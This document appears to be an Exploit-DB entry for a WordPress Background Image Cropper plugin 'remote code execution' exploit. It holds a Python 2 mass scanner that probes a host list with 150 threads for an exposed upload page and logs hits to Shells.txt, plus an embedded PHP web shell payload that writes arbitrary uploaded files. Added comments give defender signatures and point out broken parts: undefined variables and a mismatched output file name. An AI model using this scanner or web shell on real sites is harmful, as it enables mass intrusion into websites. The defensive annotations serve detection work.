
7 changes to exploits/shellcodes/ghdb Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation FlatPress v1.3 - Remote Command Execution Laravel Framework 11 - Credential Leakage SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution Flowise 1.6.5 - Authentication Bypass
# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox
import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
# colorama setup: autoreset=True restores the terminal colour after each print.
init(autoreset=True)

# PHP payload text. It prints a marker string and php_uname(), renders a
# file-upload form (field 'zb'), and copies any uploaded file to a path taken
# from the client-supplied file name.
# NOTE(review): nothing else in this listing references `shell`; the visible
# code only issues GET requests and never sends this text anywhere.
# Defender note: the literals "Ex3ptionaL" and "eXploiting Done" and the form
# field name 'zb' are usable as content signatures when sweeping a web root.
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""

# Silences urllib3 warnings, which would otherwise be emitted for the
# verify=False request made later in the file.
requests.urllib3.disable_warnings()

# Static request headers attached to every probe.
# Defender note: the User-Agent carries three misspellings ("Mozlila", "Bulid",
# "Moblie") and the referer value has no scheme. Both are distinctive in access
# logs, but they are plain constants an operator can change, so treat them as
# low-confidence indicators and key detection on the requested path instead.
# The User-Agent literal is wrapped across three lines in this listing.
headers = {'Connection': 'keep-alive',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
    'Accept':
    'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
    'referer': 'www.google.com'}

# Host list: one entry per line of the file named by the first command-line
# argument, with surrounding whitespace stripped.
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    # No argument given: print a usage line and exit. The script name is taken
    # as the last backslash-separated component of argv[0].
    path = str(sys.argv[0]).split('\\')
    exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
def URLdomain(site):
    """Return the host part of *site*.

    A leading ``http://`` or ``https://`` is removed, then everything from
    the first ``/`` onward is dropped. Note that ``str.replace`` removes every
    occurrence of the scheme text, not only the leading one.
    """
    for scheme in ("http://", "https://"):
        if site.startswith(scheme):
            site = site.replace(scheme, "")
            break

    # Each pass keeps the text before the last '/', so repeating until no
    # slash is left yields the text before the first one.
    up_to_slash = re.compile('(.*)/')
    found = up_to_slash.findall(site)
    while found:
        site = found[0]
        found = up_to_slash.findall(site)
    return site
def FourHundredThree(url):
    """Probe one host for an upload form at the plugin's ups.php path.

    Sends a GET for /wp-content/plugins/background-image-cropper/ups.php over
    http. If the response body lacks the upload-form marker, the same request
    is repeated over https with certificate verification disabled. A matching
    URL is appended to Shells.txt. This function uploads nothing; it only
    reads the response body.

    Defender notes:
      * The observable is a GET for the path above. A response carrying an
        upload form (form name/id "uploader", submit control "_upl") is what
        the script counts as a hit.
      * If a site you operate serves that form, treat the file as presumably
        an unauthenticated upload endpoint: remove or block it and review the
        plugin directory for files written through it.
      * NOTE(review): the page does not show whether ups.php ships with the
        plugin or is a previously planted file; compare against a clean copy
        of plugin version 1.2.

    The listing uses Python 2 print statements. `fg` and `fr` are not defined
    anywhere in the visible listing, and the marker literal and two calls are
    wrapped across lines.
    """
    try:
        # First attempt: plain http against the bare host name.
        url = 'http://' + URLdomain(url)
        check =
        requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
        allow_redirects=True,timeout=15)
        # Hit condition: the response body contains this upload-form fragment.
        if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
            print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
            # Append the full ups.php URL to Shells.txt in the working directory.
            open('Shells.txt', 'a').write(url +
            '/wp-content/plugins/background-image-cropper/ups.php\n')
        else:
            # Second attempt: same path over https; TLS certificate validation
            # is switched off for this request (verify=False).
            url = 'https://' + URLdomain(url)
            check =
            requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
            allow_redirects=True,verify=False ,timeout=15)
            if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('Shells.txt', 'a').write(url +
                '/wp-content/plugins/background-image-cropper/ups.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    # Bare except: every error (timeout, DNS failure, anything else) is
    # reported as a plain "Failed" line with no detail.
    except :
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
# Thread-backed pool (multiprocessing.dummy) with 150 workers; every entry in
# `target` is passed to FourHundredThree.
# Defender note: each listed host receives at most two requests, one over http
# and one over https, so a single site sees very little traffic. Detection has
# to key on the requested path, not on request volume.
mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

# NOTE(review): the message names LOL.txt, but the only file written in this
# listing is Shells.txt. `fc` is not defined in the visible listing.
print '\n [!] {}Saved in LOL.txt'.format(fc)